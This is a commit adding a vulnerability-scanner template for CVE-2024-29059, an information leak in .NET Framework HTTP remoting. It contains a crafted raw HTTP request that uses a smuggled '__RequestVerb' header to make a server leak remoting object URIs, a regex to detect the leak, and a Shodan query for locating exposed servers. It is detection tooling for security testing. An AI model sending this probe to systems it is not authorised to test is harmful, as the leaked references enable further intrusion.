Create CVE-2024-29059.yaml

http/cves/2024/CVE-2024-29059.yaml

@@ -0,0 +1,37 @@
+id: CVE-2024-29059
+
+info:
+  name: Leaking `ObjRefs` via HTTP .NET Remoting
+  author: DhiyaneshDk
+  severity: high
+  description: .NET Framework Information Disclosure Vulnerability
+  reference:
+    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059
+    - https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/
+    - https://github.com/codewhitesec/HttpRemotingObjRefLeak
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2024-29059
+    epss-score: 0.00043
+    epss-percentile: 0.07503
+  metadata:
+    max-request: 1
+    shodan-query: "Server: MS .NET Remoting"
+  tags: cve,cve2024,remoting,info-leak
+
+http:
+  - raw:
+      - |+
+        GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1
+        Host: {{Hostname}}
+        __RequestVerb: POST
+        Content-Type: text/xml
+    
+    unsafe: true
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - '/[0-9a-f_]+/[0-9A-Za-z_+]+_\d+\.rem'